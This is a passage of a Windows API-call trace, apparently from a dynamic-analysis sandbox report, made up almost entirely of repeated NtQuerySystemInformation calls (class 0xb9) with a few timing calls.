SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x28, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0272.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb60 | out: lpSystemTimeAsFileTime=0xc751dfcb60*(dwLowDateTime=0x38fcf15, dwHighDateTime=0x1d5fb6f)) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0272.279] GetTickCount () returned 0x1184600 [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x28, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0272.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation 